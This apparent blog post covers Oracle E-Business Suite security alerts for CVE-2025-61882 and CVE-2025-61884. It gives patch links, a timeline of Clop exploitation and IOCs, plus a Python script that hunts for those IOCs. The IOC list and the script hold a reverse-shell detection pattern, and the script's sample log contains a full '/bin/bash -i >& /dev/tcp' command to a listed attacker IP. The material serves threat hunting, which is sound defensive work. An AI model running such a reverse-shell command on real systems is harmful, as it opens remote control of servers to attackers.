Dear All,
In this post I am sharing details of the Oracle E-Business Suite Security Alerts that address vulnerabilities in R12.2 versions reported this year (2025).
Vulnerabilities in EBS R12.2 versions.
CVE-2025-61882 :::
The vulnerability lies in the BI Publisher Integration component of Oracle’s Concurrent Processing module, part of EBS versions 12.2.3 through 12.2.14. It allows unauthenticated attackers to send specially crafted HTTP requests that lead to remote code execution on the affected server.
Critical unauthenticated remote code execution (RCE) in Oracle E-Business Suite (EBS)
> Actively exploited in Clop-led data theft and extortion attacks
> Exploit and Oracle source code leaked publicly
> Emergency patch released
Oracle has released an emergency patch for a critical zero-day vulnerability in Oracle E-Business Suite, tracked as CVE-2025-61882. The flaw, with a CVSS score of 9.8, allows attackers to execute arbitrary code remotely without authentication.
Reports from Oracle, Mandiant, and independent researchers confirm the vulnerability has been actively exploited in campaigns by the Clop ransomware group (ransomware is a type of malicious software, or malware), leading to large-scale data theft and extortion. Public indicators of compromise (IOCs) now match exploit code that leaked on Telegram, confirming this is the same vulnerability used in recent attacks.
https://support.oracle.com/epmos/faces/DocumentDisplay?_afrLoop=274578431489086&id=3106344.1&_afrWindowMode=0&_adf.ctrl-state=1a0ce4gyc8_53
EBS R12.2 Environment :
EBS R12.1.3 Environment :
CVE-2025-61884 :::
https://support.oracle.com/epmos/faces/DocumentDisplay?_afrLoop=274764861518353&id=3107176.1&_afrWindowMode=0&_adf.ctrl-state=1a0ce4gyc8_102
After applying the CVE-2025-61884 fix you may see this issue; the patch given in the note above fixes it.
Recommended actions
- Patch immediately: Apply Oracle's Security Alert update for CVE-2025-61882. Ensure the October 2025 Critical Patch Update is installed first.
- Hunt for the following IOCs: Reverse shell commands (/bin/bash -i >& /dev/tcp), unexpected child processes from the EBS Java service, the IPs 200.107.207.26 and 185.181.60.11, and presence of files exp.py, server.py, or oracle_ebs_nday_exploit*.zip.
- Review access exposure: Identify any externally accessible EBS instances or outdated versions.
- Increase runtime visibility: Monitor for process and library behavior within application workloads, not just endpoints.
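As an added illustration of the hunting step (example code written for this post, not Oracle's tooling or the original author's), the script below checks log lines for the IOCs listed above and flags shell or interpreter processes whose parent is a java process in a hypothetical `ps -eo pid,ppid,comm` listing; the sample log lines and process table are constructed.

```python
import re

# Indicators quoted in the alert above: reverse shell pattern, two IPs, exploit file names.
IOC_PATTERNS = {
    "reverse_shell": re.compile(r"/bin/bash\s+-i\s+>&\s*/dev/tcp"),
    "known_ip": re.compile(r"(?<![\d.])(?:200\.107\.207\.26|185\.181\.60\.11)(?![\d.])"),
    "exploit_file": re.compile(r"(?:^|[\s/])(exp\.py|server\.py|oracle_ebs_nday_exploit[^\s\"']*\.zip)\b"),
}


def scan_lines(lines):
    """Return (line_index, indicator_name, matched_text) for every IOC hit in the text lines."""
    hits = []
    for i, line in enumerate(lines):
        for name, pat in IOC_PATTERNS.items():
            m = pat.search(line)
            if m:
                hits.append((i, name, m.group(m.lastindex or 0)))
    return hits


def java_children(ps_lines, suspicious=("sh", "bash", "python", "perl", "nc")):
    """Flag shell/interpreter processes spawned by a java process.
    Input is assumed to be 'ps -eo pid,ppid,comm' output (header row first)."""
    comm_by_pid, rows = {}, []
    for line in ps_lines[1:]:                      # skip the header row
        pid, ppid, comm = line.split(None, 2)
        comm_by_pid[int(pid)] = comm
        rows.append((int(pid), int(ppid), comm))
    return [(pid, ppid, comm) for pid, ppid, comm in rows
            if comm in suspicious and comm_by_pid.get(ppid) == "java"]


# Constructed sample data standing in for application-tier log lines and a process listing.
SAMPLE_LOG = [
    "2025-10-05T02:14:11Z java[4412] exec: sh -c /bin/bash -i >& /dev/tcp/185.181.60.11/443 0>&1",
    "2025-10-05T02:14:12Z http request from 10.0.12.5 status=200",
    "2025-10-05T02:14:13Z audit: file created /tmp/oracle_ebs_nday_exploit_poc.zip",
    "2025-10-05T02:15:00Z cron: applmgr ran /u01/app/scripts/backup.sh",
]
SAMPLE_PS = [
    "PID PPID COMMAND",
    "4412 1 java",
    "5120 4412 sh",
    "5121 5120 bash",
    "5200 4412 java",
]

if __name__ == "__main__":
    for idx, name, text in scan_lines(SAMPLE_LOG):
        print(f"log line {idx}: {name} -> {text}")
    for pid, ppid, comm in java_children(SAMPLE_PS):
        print(f"pid {pid} ({comm}) spawned by java pid {ppid}")
```

On a real host the same functions can be fed the contents of the application log files and the output of the ps command instead of the constructed samples.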
Important dates :
- June 2025: Dark Web posts advertise an Oracle EBS zero-day exploit for sale (~$70,000).
- August 2025: Clop begins an extortion campaign targeting EBS servers across multiple organizations.
- October 4, 2025: Oracle publishes a Security Alert for CVE-2025-61882 and releases an emergency patch.
- October 5, 2025: Mandiant confirms Clop leveraged both previously patched July vulnerabilities and this new zero-day.
- October 6, 2025: Exploit archive and partial Oracle source code leaked by a group calling itself Scattered Lapsus$ Hunters.
Thanks,
Srini